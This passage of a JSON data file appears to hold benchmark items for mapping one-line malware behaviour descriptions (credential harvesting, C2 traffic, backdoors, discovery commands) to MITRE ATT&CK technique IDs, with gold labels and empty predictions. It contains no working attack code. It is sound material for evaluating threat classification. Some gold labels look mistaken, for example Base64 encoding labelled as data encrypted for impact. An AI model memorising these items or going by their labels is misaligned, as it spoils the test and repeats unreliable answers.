+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "collects information about the Internet adapter configuration.",
+ "gold": [
+ "T1016"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "collects information on bookmarks from Google Chrome.",
+ "gold": [
+ "T1217"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "collects information on local user accounts from the victim.",
+ "gold": [
+ "T1087"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "collects information on programs and services on the victim that are configured to automatically run at startup.",
+ "gold": [
+ "T1007"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "collects lists of local accounts with administrative access, local group user accounts, and domain local groups with the commands net localgroup administrators, net localgroup users, and net localgroup /domain.",
+ "gold": [
+ "T1069"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "collects registered owner details by using the commands systeminfo and net config workstation.",
+ "gold": [
+ "T1033"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "collects system information, including the operating system version and hostname.",
+ "gold": [
+ "T1082"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "collects the username from the victim.",
+ "gold": [
+ "T1033"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "collects the victim host name and serial number, and then sends the information to the C2 server.",
+ "gold": [
+ "T1082"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "collects the victim username along with other account information (account type, description, full name, SID and status).",
+ "gold": [
+ "T1033"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "collects the victim username and sends it to the C2 server.",
+ "gold": [
+ "T1033"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "collects user credentials, including passwords, for various programs and browsers, including popular instant messaging applications, Web browsers, and email clients. Windows account hashes, domain accounts, and LSA secrets are also collected, as are WLAN keys.",
+ "gold": [
+ "T1003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "communicates over port 80 for C2.",
+ "gold": [
+ "T1043"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "communicates with its C2 domain over ports 443 and 8443.",
+ "gold": [
+ "T1043"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "contains a collection of ScriptModification modules that compress and encode scripts and payloads.",
+ "gold": [
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "contains a command to list processes.",
+ "gold": [
+ "T1057"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "contains a feature to manipulate process privileges and tokens.",
+ "gold": [
+ "T1134"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "contains a module to collect data from removable drives.",
+ "gold": [
+ "T1025"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "contains a module to move data from airgapped networks to Internet-connected systems by using a removable USB device.",
+ "gold": [
+ "T1052"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "contains a network loader to receive executable modules from remote attackers and run them on the local victim. It can also upload and download files over HTTP and HTTPS.",
+ "gold": [
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "creates a backdoor through which remote attackers can list contents of drives and search for files.",
+ "gold": [
+ "T1083"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "creates a backdoor through which remote attackers can monitor processes.",
+ "gold": [
+ "T1057"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "creates a backdoor through which remote attackers can open a command line interface.",
+ "gold": [
+ "T1059"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "creates a backdoor through which remote attackers can read data from files.",
+ "gold": [
+ "T1005"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "creates a backdoor through which remote attackers can retrieve information such as computer name, OS version, processor speed, memory size, and CPU speed.",
+ "gold": [
+ "T1082"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "creates a file named thumb.dd on all USB flash drives connected to the victim. This file contains information about the infected system and activity logs.",
+ "gold": [
+ "T1052"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "creates a scheduled task on the system that provides persistence.",
+ "gold": [
+ "T1053.005"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "CRYPTO::Extract module can extract keys by interacting with Windows cryptographic application programming interface (API) functions.",
+ "gold": [
+ "T1552.004"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "decodes the configuration data and modules.",
+ "gold": [
+ "T1140"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "decrypts and executes shellcode from a file called Stars.jps.",
+ "gold": [
+ "T1140"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "deletes its payload along with the payload's parent process after it finishes copying files.",
+ "gold": [
+ "T1070.004"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "delets all artifacts associated with the malware from the infected machine.",
+ "gold": [
+ "T1070"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "deobfuscates its code.",
+ "gold": [
+ "T1140"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "developed a file stealer to search C:\\ and collect files with certain extensions. also executed a script to enumerate all drives, store them as a list, and upload generated files to the C2 server.",
+ "gold": [
+ "T1119"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "disables the Windows firewall before binding to a port.",
+ "gold": [
+ "T1562.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "downloads additional plug-ins to load on the victim\u2019s machine, including the ability to upgrade and replace its own binary.",
+ "gold": [
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "downloads and uploads files to and from the victim\u2019s machine.",
+ "gold": [
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "downloads another dropper from its C2 server.",
+ "gold": [
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "DPAPI module can harvest protected credentials stored and/or cached by browsers and other user applications by interacting with Windows cryptographic application programming interface (API) functions.",
+ "gold": [
+ "T1552.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "drops a malicious file (sspisrv.dll) alongside a copy of lsass.exe, which is used to register a service that loads sspisrv.dll as a driver. The payload of the malicious driver (located in its entry-point function) is executed when loaded by lsass.exe before the spoofed service becomes unstable and crashes.",
+ "gold": [
+ "T1547.008"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "drops and executes a malicious CPL file as its payload.",
+ "gold": [
+ "T1218.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "drops files with base64-encoded data.",
+ "gold": [
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "enables concurrent Remote Desktop Protocol (RDP).",
+ "gold": [
+ "T1021.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "encodes C2 communications with base64.",
+ "gold": [
+ "T1001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "encodes C2 traffic with single-byte XOR keys.",
+ "gold": [
+ "T1573"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "encrypts C2 data with AES256 in ECB mode.",
+ "gold": [
+ "T1573"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "encrypts data using Base64 before being sent to the command and control server.",
+ "gold": [
+ "T1486"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "enumerates all running processes.",
+ "gold": [
+ "T1057"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "enumerates Registry keys associated with event logs.",
+ "gold": [
+ "T1012"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "enumerates registry keys with the command regkeyenum and obtains information for the Registry key HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run.",
+ "gold": [
+ "T1012"
+ ],
+ "predicted": ""
+ },
+ {
